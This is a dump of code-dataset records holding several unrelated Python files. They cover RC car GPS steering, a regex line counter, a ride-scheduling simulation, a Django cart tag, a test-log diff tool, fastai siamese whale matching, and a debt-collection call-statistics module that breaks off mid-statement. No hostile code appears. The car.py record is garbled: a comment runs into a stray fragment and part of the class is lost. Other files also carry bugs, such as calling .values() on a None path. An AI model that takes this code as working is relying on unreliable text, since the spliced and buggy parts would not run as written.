gps.timestamp_utc.tm_sec))\n# print('Latitude: {0:.6f} degrees'.format(gps.latitude))\n# print('Longitude: {0:.6f} degrees'.format(gps.longitude))\n\ndef main():\n while True:\n move(1.0)\n\nclass Car:\n def __init__(self):\n self.v1 = 0.0\n self.v2 = 0.0\n\ndef moveToCoord(lat2, lon2):\n # refreshRate = 0.1\n print(\"moving to \" + str(lat2) + \", \" + str(lon2))\n startTime = time.monotonic()\n\n lat1 = lon1 = None\n\n last_print = time.monotonic()\n last_signal = time.monotonic()\n dlat = dlon = 1.0\n while True:\n gps.update()\n current = time.monotonic()\n if current - last_print >= refreshRate:\n last_print = current\n\n # if not gps.has_fix:\n # # Try again if we don't have a fix yet.\n # print('Waiting for fix...' + str(current - startTime))\n # continue\n\n if gps.has_fix:\n last_signal = time.monotonic()\n # Print out details about the fix like location, date, etc.\n print('=' * 40) # Print a separator line.\n print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(\n gps.timestamp_utc.tm_mon, # Grab parts of the time from the\n gps.timestamp_utc.tm_mday, # struct_time object that holds\n gps.timestamp_utc.tm_year, # the fix time. 
Note you might\n                gps.timestamp_utc.tm_hour, # not get all data like year, day,\n                gps.timestamp_utc.tm_min, # month!\n                gps.timestamp_utc.tm_sec))\n                print('Latitude: {0:.10f} degrees'.format(gps.latitude))\n                print('Longitude: {0:.10f} degrees'.format(gps.longitude))\n                # error: ValueError: unknown format code 'f' for object of type 'str'\n                # when lat and lon are uninitialized, value = None\n                if gps.satellites is not None:\n                    print('# satellites: {}'.format(gps.satellites))\n                lat1 = gps.latitude\n                lon1 = gps.longitude\n                dlat = (lat1 - lat2)\n                dlon = (lon1 - lon2)\n                print((dlat, dlon)) # if dist > 1.0 else move(1.0)\n\n                if (abs(dlat) > 0.0001 or abs(dlon) > 0.0001):\n                    move(1.0)\n                else:\n                    stop()\n\n                # TODO: turns + move --> smoother transitions\n                relativeBearing = bearing(lat1, lon1, lat2, lon2) - heading() # angle in degrees CW from heading to destination\n                turn(relativeBearing / 180) # want relativeBearing (a number, not a callable) to oscillate around 0\n                print(relativeBearing)\n                # dist = coordDist(lat1, lon1, lat2, lon2) # coordDist is never defined in this file\n\n            else:\n                move(defaultMoveSpeed)\n                # lostSignalTimer = 5.0\n                # if time.monotonic() - last_signal > lostSignalTimer:\n                #     # if lost signal, stop after 5 sec timer\n                #     stop()\n\n            # check for obstacles\n            if sonar_front.dist_cm() < sonarSensitivityFront:\n                stop()\n                # turn(defaultTurnSpeed)\n\n    stop()\n\ndef setV(v):\n    if v < 0:\n        return v if v >= -1.0 else -1.0\n    return v if v <= 1.0 else 1.0\n\ndef stop():\n    print(\"stop\")\n    servo1.throttle = 0.0\n    servo2.throttle = 0.0\n\ndef turn(dv, timer=0.1, pivot=False):\n    # offset both wheels from their current throttle; v1/v2 were never defined as globals\n    vv1 = setV(servo1.throttle + dv)\n    vv2 = setV(servo2.throttle + dv)\n    servo1.throttle = vv1\n    servo2.throttle = vv2\n    # time.sleep(timer)\n\ndef move(v, timer=0.1):\n    servo1.throttle = setV(v)\n    servo2.throttle = setV(-v)\n    # time.sleep(timer)\n    return (v, -v)\n\n# angle in degrees CW from North to direction car is pointing\ndef heading():\n    # 'sensor' (an LSM9DS1 instance) is expected to be created during setup\n    mag_x, mag_y, mag_z = sensor.magnetic\n    # atan2 handles all four quadrants and mag_y == 0\n    return m.degrees(m.atan2(mag_x, mag_y))\n\n# angle in degrees CW from North to destination\ndef bearing(lat1, lon1, lat2, lon2):\n    # REF: https://www.movable-type.co.uk/scripts/latlong.html\n    phi1, phi2, lambda1, lambda2 = map(m.radians, [lat1, lat2, lon1, lon2])\n    y = m.sin(lambda2 - lambda1) * m.cos(phi2)\n    x = m.cos(phi1) * m.sin(phi2) \\\n        - m.sin(phi1) * m.cos(phi2) \\\n        * m.cos(lambda2 - lambda1)\n    return m.degrees(m.atan2(y, x))\n\ndef deinit():\n    sonar_front.deinit()\n\n# run the main loop first and only release the sonar afterwards\ntry:\n    main()\nfinally:\n    deinit()\n","sub_path":"car52.py","file_name":"car52.py","file_ext":"py","file_size_in_byte":8699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"167640263","text":"from re import compile\n\nreg_ex_letters = compile(r\"[A-Za-z]\")\n\nreg_ex_punctuation = compile(\n    r\"[\\!\\\"\\#\\$\\%\\&\\\\\\'\\(\\)\\*\\+\\,\\-\\.\\/\\:\\;\\<\\=\\>\\?\\@\\[\\\\\\\\\\]\\^\\_\\`\\{\\|\\}\\~]\"\n)\n\nwith open(\"text.txt\", \"rt\") as file_in:\n    with open(\"output.txt\", \"wt\") as file_out:\n        file_out.writelines(\n            [\n                f\"Line {k}: {v.strip()} ({len(reg_ex_letters.findall(v))})({len(reg_ex_punctuation.findall(v))})\\n\"\n                for k, v in enumerate(file_in.readlines(), 1)\n            ]\n        )\n","sub_path":"ADVANCED_MODULE/07_File_Handling/Line_Numbers.py","file_name":"Line_Numbers.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"369794744","text":"class Car:\n    nb_car = 0\n    step = 0\n    maxStep = 0\n    score = 0\n    bonus = 0\n    bonusMultiplier = 1 #the lower it is, the more important bonuses are (0= rides[self.occupation][4]:\n
self.move(self.target[0],self.target[1])\n if self.pos == self.target:\n if self.inRides == 0:\n self.target = (rides[self.occupation][2],rides[self.occupation][3])\n self.inRides = 1\n elif self.inRides == 1:\n self.inRides =0\n self.rCompleted.append(self.occupation)\n self.occupation = -1\n else:\n print(\"error\")\n if self.occupation == -1 and self.stopped == 0:\n closest = self.findMostProfitable(rides)\n if closest != -1:\n self.assign(closest, rides[closest])\n\n elif closest == -1:\n self.stopped = 1\n\n\n #return rides\n\n def distance(self, a,b): #target is (x,y)\n return abs(self.pos[0]-a)+abs(self.pos[1]-b)\n\n def findClosestAcceptable(self, rides):\n closest = (999999999999999999, -1) # distance, idRide\n for ride in rides:\n if rides[ride][6] == 0:\n distance = self.distance(rides[ride][0],rides[ride][1])\n if (self.distance(rides[ride][0],rides[ride][1])+Car.step) <= rides[ride][4]:\n distance *= Car.bonusMultiplier\n timeNeeded = (self.distance(rides[ride][0],rides[ride][1])+abs(rides[ride][2] - rides[ride][0]) + abs(rides[ride][3] - rides[ride][1])+Car.step)\n if distance < closest[0] and timeNeeded <= rides[ride][5] and timeNeeded <= Car.maxStep:\n closest = (self.distance(rides[ride][0],rides[ride][1]),ride)\n\n return closest[1]\n\n def findMostProfitable(self, rides):\n mostProfitables = (0, -1)\n for ride in rides:\n if rides[ride][6] == 0:\n score = 0\n distance = self.distance(rides[ride][0], rides[ride][1])\n timeNeeded = (distance + abs(rides[ride][2] - rides[ride][0]) + abs(rides[ride][3] - rides[ride][1]))+Car.step\n if timeNeeded <= rides[ride][5] and timeNeeded <= Car.maxStep:\n score += abs(rides[ride][2] - rides[ride][0]) + abs(rides[ride][3] - rides[ride][1])\n if distance + Car.step <= rides[ride][4]:\n score += Car.bonus\n if (score/timeNeeded) > mostProfitables[0]:\n mostProfitables =((score/timeNeeded),ride)\n return mostProfitables[1]\n\n\n def move(self,a,b):\n x = self.pos[0]\n y = self.pos[1]\n if x!=a:\n if x < a:\n x += 1\n elif x > a:\n x -=1\n elif y!=b:\n if y < b:\n y+=1\n elif y > b:\n y-=1\n self.pos = (x,y)\n","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79335684","text":"from django import template\nfrom cart import cart\n\nregister = template.Library()\n\n@register.inclusion_tag(\"cart/cart_box.html\")\ndef cart_box(request):\n box_count = cart.cart_count(request)\n return {\n 'box_count': box_count,\n}\n","sub_path":"cart/templatetags/cart_filters.py","file_name":"cart_filters.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"387037530","text":"#!/usr/bin/python3\n\nimport sys, os \nimport subprocess as sub \n\nfrom itertools import groupby \nfrom operator import itemgetter\nfrom collections import namedtuple\n\nfrom testparser import *\nfrom fdfetcher import *\n\n# nfd contains NEW result\n# ofd contains OLD result\n# sum is for create a file to store summery\n\"\"\"\ndef DiffTests(nfd,ofd,sum=None):\n #check file exist or not \n print('=== > Diff ...ING')\n if os.path.isfile(nfd) and os.path.isfile(ofd):\n pass\n else:\n raise ValueError(\"Make sure %s,%s exist !\",nfd,ofd)\n\n # TODO: [ISSUE] newfd/oldfd can only be handled once, \n #with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd:\n # # legacy fail\n # oldfail = set(newfd).intersection(oldfd) \n # ### here , iterator oldfd/newfd consumed 
up .... so below data set all empty \n # # legacy fail\n # newfail = set(newfd)-set(oldfd) \n # # failure in old but pass in new \n # fixedfail = set(oldfd)-set(newfd) \n\n with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd:\n oldfail = set(newfd).intersection(oldfd)\n print('\\n####################\\n[##### OLD #####]')\n for i in sorted(oldfail):\n print(i.strip())\n\n with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd: \n # legacy fail\n newfail = set(newfd)-set(oldfd) \n print('\\n####################\\n[##### New #####]')\n for i in sorted(newfail):\n print(i.strip())\n\n with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd:\n # failure in old but pass in new \n fixedfail = set(oldfd)-set(newfd) \n print('\\n####################\\n[##### FIXED #####]')\n for i in sorted(fixedfail):\n print(i.strip())\n\"\"\"\n# parse raw log file\ndef DiffTestsFilter(nlog,olog,sum=None):\n #check file exist or not \n print('=== > Diff ...ING')\n if os.path.isfile(nlog) and os.path.isfile(olog):\n pass\n else:\n raise ValueError(\"Make sure %s,%s exist !\",nlog,olog)\n \n NewList = []\n OldList = []\n \n ErrTestTuple = namedtuple('ErrTestTuple', ['errname','testid'])\n # Only namedtuple can -> set , dict cannot \n with open(nlog, 'r') as newfd, open(olog, 'r') as oldfd:\n #filterRegex = r\"(?P@@@@ First error msg.*$|Error Detected:)(?:(?:\\n|.)*?)(?P(?:&&&&) (?:PASSED|FAILED|WAIVED) cudnnTest.*$)\"\n filterFailReg = r\"(@@@@ First error msg.*$|Error Detected:)(?:(?:\\n|.)*?)((?:&&&&) (?:FAILED) cudnnTest.*$)\"\n for rnew in re.findall(filterFailReg, newfd.read(),re.MULTILINE):\n NewList.append(ErrTestTuple(*rnew))\n #NewList.append(rnew.groupdict())\n for rold in re.findall(filterFailReg, oldfd.read(),re.MULTILINE):\n OldList.append(ErrTestTuple(*rold))\n #OldList.append(rold.groupdict())\n # before groupby(the key \"errname\") , need to sort list first\n NewList.sort(key=lambda t:t.errname) \n OldList.sort(key=lambda t:t.errname) \n \n #for i in NewList:\n # print('NewList ',i)\n oldfailSet = set(NewList).intersection(set(OldList))\n print('\\n####################\\n[##### OLD #####]')\n for err, testItem in groupby(oldfailSet,key=lambda t:t.errname):\n print(\"[error Info] \\n\\t%s \\n\" % err)\n for t in testItem:\n print('\\t',t.testid)\n\n newfailSet = set(NewList) - set(OldList)\n print('\\n####################\\n[##### New #####]')\n for err, testItem in groupby(newfailSet,key=lambda t:t.errname):\n print(\"[error Info] \\n\\t%s \\n\" % err)\n for t in testItem:\n print('\\t',t.testid)\n\n fixedSet = set(OldList) - set(NewList)\n print('\\n####################\\n[##### Fixed #####]')\n for err, testItem in groupby(fixedSet,key=lambda t:t.errname):\n print(\"[error Info] \\n\\t%s \\n\" % err)\n for t in testItem:\n print('\\t',t.testid)\n\ndef LocateFd(path,filepat):\n print('Looking for : %s'% filepat)\n for (ThisLeveldirs, sub_dirs, files) in os.walk(path):\n for fd in files:\n if filepat in fd:\n # ThisLeveldirs is where fd located\n return os.path.join(ThisLeveldirs,fd)\n #print(\"no files at this level\")\n return None\n\"\"\"\n##################\n###### No.01######\n##################\n# UUID lists group by keys\n# arbitrary lists TODO \n# arbitrary keys to compare \ndef DiffUUIDMixed(ResuListx2,key1='suite',key2='cid'):\n grouper = itemgetter(key1, key2)\n ResuListx2.sort(key=grouper)\n for key, testItem in groupby(ResuListx2,key=grouper):\n print('===== [TID Groups] ===== \\n\\t',key)\n \n ResuGroup = []\n count = 0\n for t in testItem:\n ResuGroup.append(t) \n count = count + 1\n 
print(\"Contain: %d member\"%count) \n \n if count == 1:\n # nothing to compare \n tsuite = ResuGroup[0]\n print(\"[Single suite]\\n\\t\",tsuite.values())\n print('====================',key)\n elif count == 2:\n # both suites \"failed\" AND both have log, makes sense to DIFF \n t1,t2 = ResuGroup\n if (t1['resu'] == 'failed' and t2['resu'] == 'failed')\\\n and t1['log'] \\\n and t2['log']:\n print(\"[Diff suite]\\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values())\n print('====================',key) \n\n log1 = LocateFd(locTrgdir,t1['log']+'.log')\n log2 = LocateFd(locTrgdir,t2['log']+'.log')\n\n if log1 is None or log2 is None:\n # it is for \"failed\" on \"BADDRIVER\" which display 'log' but no log generated \n print(\"[Failed to locate log in suite] Double check \\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values()) \n else:\n #flog1 = TestFilter(log1,keyword=\"FAILED\",logfail=True, diffuuid=True)\n #flog2 = TestFilter(log2,keyword=\"FAILED\",logfail=True, diffuuid=True)\n print('CMP...ing :',flog1,flog2)\n #DiffTests(flog1,flog2)\n DiffTestsFilter(log1,log2)\n elif t1['resu'] == 'passed' or t2['resu'] == 'passed':\n print(\"[PASS in suite] Compare by testparser \\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values()) \n elif not t1['log'] or not t2['log']:\n # one log is empty\n print(\"[EMPTY log in suite] Re-Run \\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values()) \n else:\n print('***** [WARNING] count is %d' % count)\n for r in ResuGroup:\n print(r)\n\"\"\"\n###################\n###### No.02 ######\n###################\n# Pair (new,old) entry AND can tell new/old\n\ndef DiffUUIDSep(RListNew, RListOld, key1='suite',key2='cid'):\n # new combo key - area I care/filter \n ComkeyNew = {(d[key1], d[key2]): d for d in RListNew}\n ComkeyOld = {(d[key1], d[key2]): d for d in RListOld}\n\n # Full lists:\n # Pair (newList,OldList) based on combo key (suite/cid)\n RListPair = [(ComkeyNew.get(k, None), ComkeyOld.get(k, None)) for k in set(ComkeyNew) | set(ComkeyOld)]\n\n for r in RListPair:\n new,old=r\n # check if only one valid result only\n if None in r:\n # nothing to compare \n print(\"\\n**********************************\\n\")\n print(\"\\t[Single suite]\\n\\t\")\n print('[new uuid] : ',new)\n print('[old uuid] : ',old)\n else:\n print(\"\\n**********************************\\n\")\n # both suites \"failed\" AND both have log, makes sense to DIFF \n if (new['resu'] == 'failed' and old['resu'] == 'failed')\\\n and new['log'] \\\n and old['log']:\n print(\"[Diff suite]\\n\")\n print(\"\\t\",new.values())\n print(\"\\t\",old.values())\n\n lognew = LocateFd(locTrgdir,new['log']+'.log')\n logold = LocateFd(locTrgdir,old['log']+'.log')\n\n if lognew is None or logold is None:\n # it is for \"failed\" on \"BADDRIVER\" which display 'log' but no log generated \n print(\"[Failed to locate log in suite] Double check \\n\")\n print(\"\\t new: \",lognew.values())\n print(\"\\t old: \",logold.values()) \n else:\n flognew= TestFilter(lognew,keyword=\"FAILED\",logfail=True, diffuuid=True)\n flogold= TestFilter(logold,keyword=\"FAILED\",logfail=True, diffuuid=True)\n print('CMP...ing ')\n print('[new:%s] \\n', flognew)\n print('[old:%s] \\n', flogold)\n #DiffTests(flognew,flogold)\n DiffTestsFilter(flognew,flogold)\n\n elif new['resu'] == 'passed' or old['resu'] == 'passed':\n print(\"[PASS in suite] Compare by testparser \\n\")\n print(\"[new:%s]\" % new.values())\n print(\"[old:%s]\" % old.values()) \n elif not new['log'] or not old['log']:\n # one log is 
empty\n                print(\"[EMPTY log in suite] Re-Run \\n\")\n                print(\"\\t\",new.values())\n                print(\"\\t\",old.values()) \n    \n    \nif __name__==\"__main__\":\n    import sys\n    # two paths are required, so argv must have at least three entries\n    if(len(sys.argv) < 3):\n        print(\"PROG /ws/abspath/src.log /ws/abspath/src.fail\")\n        print(\"compare different uuid's test suite\")\n    else:\n        newfd = sys.argv[1]\n        oldfd = sys.argv[2] \n        #DiffTests(newfd, oldfd) \n        DiffTestsFilter(newfd, oldfd)\n","sub_path":"src/difftest.py","file_name":"difftest.py","file_ext":"py","file_size_in_byte":9989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"561144866","text":"\nfrom utils import *\nfrom fastai.callbacks import *\nimport torchvision\n\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n#some parameters\ndebug = 0\nenable_lr_find = 1\nnow_str = now2str(format=\"%Y-%m-%d_%H-%M-%S\")\ntxlog = tx.SummaryWriter(f'../tblog/{now_str}')\n\narch = models.resnet18\nim_size = 224\nif debug == 1:\n    #arch = torchvision.models.squeezenet1_1(pretrained=True)\n    train_batch_size = 8\n    val_batch_size = 8\n    dl_workers = 0\nelse:\n    train_batch_size = 64\n    val_batch_size = 256\n    dl_workers = 4\nseed = 1\n\nemb_len = 128\ndiff_method = 1\n\nroot_path = '../input/'\nif debug == 1:\n    train_path = '../input/train1_224/'\n    test_path = '../input/test1_224/'\nelif debug == 2:\n    train_path = '../input/train2_224/'\n    test_path = '../input/test2_224/'\nelse:\n    train_path = '../input/train_224/'\n    test_path = '../input/test_224/'\n\n\ndf0 = pd.read_csv('../input/train.csv')\ndf_new = df0[df0.Id == 'new_whale']\ndf_known = df0[df0.Id != 'new_whale']\nif debug:\n    train_list = train_list_dbg\n    val_list = val_list_dbg\nelse:\n    train_list, val_list = split_whale_set(df0, nth_fold=0, new_whale_method=1, seed=1)\nprint(len(train_list), len(val_list))\n\nim_count = df0[df0.Id != 'new_whale'].Id.value_counts()\nim_count.name = 'sighting_count'\nex_df = df0.join(im_count, on='Id')\n\npath2fn = lambda path: re.search('\\w*\\.jpg$', path).group(0)\nfn2label = {row[1].Image: row[1].Id for row in df0.iterrows()}\nclass_dict = make_whale_class_dict(df0)\nfile_lut = df0.set_index('Image').to_dict()\n\nim_tfms = get_transforms(do_flip=False, max_zoom=1, max_warp=0, max_rotate=2)\n\n\ndata = (\n    ImageItemList\n    # .from_df(df_known, 'data/train', cols=['Image'])\n    .from_folder(train_path)\n    # .split_by_idxs(train_item_list, val_item_list)\n    .split_by_valid_func(lambda path: path2fn(str(path)) in val_list)\n    # .split_by_idx(val_list)\n    # .random_split_by_pct(seed=SEED)\n    .label_from_func(lambda path: fn2label[path2fn(str(path))])\n    #.add_test(ImageItemList.from_folder(test_path))\n    .transform([None, None], size=im_size, resize_method=ResizeMethod.SQUISH)\n    #.transform(im_tfms, size=im_size, resize_method=ResizeMethod.SQUISH)\n    .databunch(bs=train_batch_size, num_workers=dl_workers, path=root_path)\n    #.normalize(imagenet_stats)\n)\n\ndata.add_tfm(normalize_batch)\n\ntrain_dl = DataLoader(\n    SiameseDs(data.train_ds),\n    batch_size=train_batch_size,\n    shuffle=True,\n    #collate_fn=siamese_collate,\n    num_workers=dl_workers\n)\n\ndata_v = (\n    ImageItemList\n    # .from_df(df_known, 'data/train', cols=['Image'])\n    .from_folder(train_path)\n    # .split_by_idxs(train_item_list, val_item_list)\n    .split_by_valid_func(lambda path: path2fn(str(path)) in val_list)\n    # .split_by_idx(val_list)\n    # .random_split_by_pct(seed=SEED)\n    .label_from_func(lambda path: fn2label[path2fn(str(path))])\n    .add_test(ImageItemList.from_folder(test_path))\n    #.transform([None, None], size=im_size, 
resize_method=ResizeMethod.SQUISH)\n #.transform(im_tfms, size=im_size, resize_method=ResizeMethod.SQUISH)\n .databunch(bs=train_batch_size, num_workers=dl_workers, path=root_path)\n .normalize(imagenet_stats)\n)\n\n#v = SimpleDataset(data.valid)\nvalid_dl = DataLoader(\n SimpleDataset(data_v.valid_ds),\n batch_size=val_batch_size,\n shuffle=False,\n drop_last=False,\n num_workers=dl_workers\n)\n\ntest_dl = DataLoader(\n SimpleDataset(data_v.test_ds),\n batch_size=val_batch_size,\n shuffle=False,\n drop_last=False,\n num_workers=dl_workers\n)\n\nref_dl = DataLoader(\n SimpleDataset(data_v.train_ds),\n batch_size=val_batch_size,\n shuffle=False,\n #collate_fn=siamese_collate,\n num_workers=dl_workers\n)\n\ndata_bunch = ImageDataBunch(train_dl, valid_dl, fix_dl=ref_dl)\n\n'''\ndata_bunch.train_dl = DataLoaderTrain1(train_dl, device, tfms=im_tfms[0], collate_fn=collate_siamese)\n#data_bunch.valid_dl = DataLoaderMod(valid_dl, None, None, siamese_collate)\ndata_bunch.valid_dl = DataLoaderVal(valid_dl, device, tfms=None, collate_fn=data_collate)\ndata_bunch.test_dl = DataLoaderVal(test_dl, device, tfms=None, collate_fn=data_collate)\ndata_bunch.fix_dl = DataLoaderVal(ref_dl, device, tfms=None, collate_fn=data_collate)\n#data_bunch.add_tfm(normalize_batch)\n#data_bunch.valid_dl = None\n'''\n\n#for batch in data_bunch.train_dl:\n# print(len(batch))\n# break\n#for batch in data_bunch.fix_dl:\n# print(len(batch))\n# break\n#\n#exit()\n\n#siamese = SiameseNet(emb_len, arch=arch, width=im_size, height=im_size, diff_method=diff_method)\nsiamese = SiameseNetwork(arch=arch)\n\n# new_whale should not be involved in positive distance\nnew_whale_idx = find_new_whale_idx(data.train_ds.y.classes)\n#new_whale_idx = find_new_whale_idx(data_v.valid_ds.y.classes)\n#triploss = TripletLoss(margin=0.2)\ncontrastive_loss = ContrastiveLoss(margin=1.0)\n\nlearn = LearnerEx(data_bunch,\n siamese,\n enable_validate=False,\n loss_func=BCEWithLogitsFlat(),\n #loss_func=contrastive_loss,\n #metrics=[lambda preds, targs: accuracy_thresh(preds.squeeze(), targs, sigmoid=False)]\n )\n\nlearn.load(f'res18-siamese-stage-2')\nlearn.model.to(device)\n\nmap5, top5_matrix, pos_dist_max, neg_dist_min = siamese_mat(valid_dl, learn.model, ref_dl,\n pos_mask=[0], ref_idx2class=ref_dl.ds.y,\n target_idx2class=valid_dl.ds.y)\n\nprint(map5, pos_dist_max, neg_dist_min)\n\n","sub_path":"backup/siamese_t.py","file_name":"siamese_t.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"153543462","text":"# -*- coding:utf-8 -*-\n\nimport logging\nimport datetime\n\nfrom bottle import get\n\nfrom bomber.models_readonly import (\n CallActionsR,\n ApplicationR,\n RepaymentLogR,\n NewCdrR\n)\nfrom bomber.models import AutoIVRActions, Contact\nfrom bomber.constant_mapping import Cycle, ApplicationStatus\nfrom bomber.auth import check_api_user\nfrom bomber.plugins import ip_whitelist_plugin\nfrom bomber.utils import plain_query\n\n\n@get('/api/v1/calc/callactions/', skip=[ip_whitelist_plugin])\ndef calc_call_actions_for_goden_eye(application_id):\n \"\"\"\n 根据application_id获取用户上次逾期数据,计算相关数据\n \"\"\"\n check_api_user()\n args = plain_query()\n finished_at = args.get(\"finished_at\")\n result = {}\n # application没有,ivr中也可能有数据\n is_ivrjt_res = calc_is_get_through_auto_ivr(application_id, finished_at)\n result.update(is_ivrjt_res)\n application = (ApplicationR\n .select(ApplicationR.id, ApplicationR.user_id,\n ApplicationR.finished_at, ApplicationR.created_at)\n 
.where(ApplicationR.id == application_id,\n                          ApplicationR.status == ApplicationStatus.REPAID.value)\n                   .first())\n    if not application:\n        # the IVR covers calls made before repayment, before the case entered bomber\n        result[\"is_lsbr_bff\"] = is_ivrjt_res[\"is_ivrjt\"]\n        return {\"data\": result}\n    try:\n        call_actions_res = calc_call_actions(application, result[\"is_ivrjt\"])\n        result.update(call_actions_res)\n        newcdr_self_and_ec_res = calc_newcdr_self_and_ec_num(application)\n        result.update(newcdr_self_and_ec_res)\n    except Exception as e:\n        logging.error(\n            \"calc_call_actions_for_goden_eye failed, appid:%s, error:%s\" % (\n                application_id, str(e)))\n        return {\"data\": result}\n    return {\"data\": result}\n\n\n# compute the fields listed in calc_keys\ndef calc_call_actions(application=None, is_lsbr_bff=0):\n    result = {}\n    if not application:\n        logging.info(\"calc_call_actions failed, application is none\")\n        return result\n    # fetch the call records whose collection cycle is 1a\n    call_actions = (CallActionsR\n                    .select()\n                    .where(CallActionsR.cycle == Cycle.C1A.value,\n                           CallActionsR.application_id == application.id)\n                    .order_by(-CallActionsR.created_at)\n                    )\n    # timestamps three and seven days before the repayment was completed\n    finish_three_day = application.finished_at + datetime.timedelta(days=-3)\n    finish_seven_day = application.finished_at + datetime.timedelta(days=-7)\n    # fetch the repayment records\n    repayment_logs = get_repayment_log(application)\n    # whether the last call before repayment has been identified yet\n    is_before_finish_last_contact = False\n    overdue_ptp_KP_dict = {}\n    result.update({\"br_tercnt\": 0,\n                   \"br_jtcnt\": 0,\n                   \"ec_jtcnt\": 0,\n                   \"klec_num\": 0,\n                   \"yxec_num\": 0,\n                   \"hlec_num\": 0,\n                   \"klec_tercnt\": 0,\n                   \"od_ptp_cnt\": 0,\n                   \"od_kp_cnt\": 0\n                   })\n    for call in call_actions:\n        if call.phone_status == 4 and call.real_relationship == 1:\n            result[\"is_brcont\"] = 1\n            result[\"br_jtcnt\"] += 1\n            # whether the borrower was reached within 3 / 7 days before repayment completed\n            if call.created_at > finish_seven_day:\n                result[\"is_brjt_bf7laf\"] = 1\n            if call.created_at > finish_three_day:\n                result[\"is_brjt_bf3laf\"] = 1\n            if call.commit == 1:\n                result[\"br_tercnt\"] += 1\n        elif call.phone_status == 4 and call.real_relationship in (2, 3, 4):\n            result[\"ec_jtcnt\"] += 1\n            result[\"klec_num\"] += 1\n            if call.connect_applicant == 1:\n                result[\"yxec_num\"] += 1\n            if call.help_willing != 2:\n                result[\"hlec_num\"] += 1\n            if call.commit == 1:\n                result[\"klec_tercnt\"] += 1\n        else:\n            pass\n        if call.admit_loan == 1:\n            result[\"is_od_nal\"] = 1\n        if call.overdue_reason:\n            overdue_reason_key = \"is_od_rs%s\" % call.overdue_reason\n            result[overdue_reason_key] = 1\n        if call.pay_willing:\n            pay_willing_key = \"is_pw%s\" % call.pay_willing\n            result[pay_willing_key] = 1\n        if call.pay_ability:\n            pay_ability_key = \"is_pa%s\" % call.pay_ability\n            result[pay_ability_key] = 1\n        # count promises to pay (PTP) and kept promises (KP)\n        if call.promised_date:\n            result[\"od_ptp_cnt\"] += 1\n            KP_key = \"%s-%s\" % (call.created_at.strftime(\"%Y%m%d%H%M%S\"),\n                                call.promised_date.strftime(\"%Y%m%d%H%M%S\"))\n            for repayment in repayment_logs:\n                if KP_key in overdue_ptp_KP_dict:\n                    break\n                else:\n                    call_promised_date = datetime.datetime.strptime(\n                        call.promised_date.strftime(\"%Y-%m-%d 23:59:59\"),\n                        \"%Y-%m-%d %H:%M:%S\")\n                    if (call.created_at <= repayment.repay_at and\n                            repayment.repay_at <= call_promised_date):\n                        overdue_ptp_KP_dict[KP_key] = 1\n                        result[\"od_kp_cnt\"] += 1\n        # if this call connected before the repayment finished and no later connected call\n        # has been seen yet, it is the last connected call before repayment; record whether\n        # it reached the borrower in person\n        if (not is_before_finish_last_contact and\n                call.created_at <= application.finished_at and\n                call.phone_status == 4):\n            is_before_finish_last_contact = True\n            if call.real_relationship == 1:\n                result[\"is_lsbr_bff\"] = 1\n            else:\n                result[\"is_lsbr_bff\"] = 0\n    # if there were no call_actions, fall back to the IVR value, i.e. the calls\n    # made to the borrower before the case entered bomber\n    if \"is_lsbr_bff\" not in result:\n        result[\"is_lsbr_bff\"] = is_lsbr_bff\n    return result\n\n\n# count calls dialed to the borrower and to emergency contacts (EC)\ndef calc_newcdr_self_and_ec_num(application=None):\n    result = {\"br_cacnt\": 0, \"ec_cacnt\": 0}\n    if not application:\n        logging.info(\n            \"calc_newcdr_self_and_ec_num failed, application is none\")\n        return result\n    # fetch the normalized phone numbers\n    self_number, ec_number = handle_contact_num(application)\n    if not any((self_number, ec_number)):\n        logging.info(\n            \"get user_id=:%s contact number is null\" % application.user_id)\n        return result\n    number = self_number + ec_number\n    # fetch the call records from NewCdr\n    newcdrs = NewCdrR.select(NewCdrR.callto).where(\n        NewCdrR.loanid == str(application.id),\n        NewCdrR.callto << number)\n    for newcdr in newcdrs:\n        if newcdr.callto in self_number:\n            result[\"br_cacnt\"] += 1\n        else:\n            result[\"ec_cacnt\"] += 1\n    return result\n\n\n# normalize the contact numbers; numbers in NewCdrR carry a leading 0\ndef handle_contact_num(application=None):\n    if not application:\n        logging.info(\"handle_contact_num failed, application is none\")\n        return False, False\n    # fetch the qualifying numbers: borrower (relationship=0), ec (relationship=1, source=ec);\n    # the parentheses around each comparison are required, & binds tighter than ==\n    contacts = (Contact\n                .select(Contact.number, Contact.relationship)\n                .where(Contact.user_id == application.user_id,\n                       (Contact.relationship == 0) |\n                       ((Contact.relationship == 1) & (Contact.source == 'ec')))\n                )\n    self_number, ec_number = [], []\n    # normalize each number\n    for call in contacts:\n        # skip empty numbers\n        if not call.number:\n            continue\n        c_numbers = call.number.split(\",\")\n        for c in c_numbers:\n            new_c = c.replace(\"+62\", \"\")\n            new_c = new_c.replace(\"-\", \"\")\n            # numbers in NewCdrR carry a leading 0\n            new_c = \"0{}\".format(new_c)\n            if call.relationship == 0:\n                self_number.append(new_c)\n            else:\n                ec_number.append(new_c)\n    # de-duplicate both lists\n    self_number = list(set(self_number))\n    ec_number = list(set(ec_number))\n    return self_number, ec_number\n\n\n# fetch the repayment records\ndef get_repayment_log(application=None):\n    if not application:\n        logging.info(\"get_repayment_log failed, application is none\")\n        return False\n    repayment_logs = 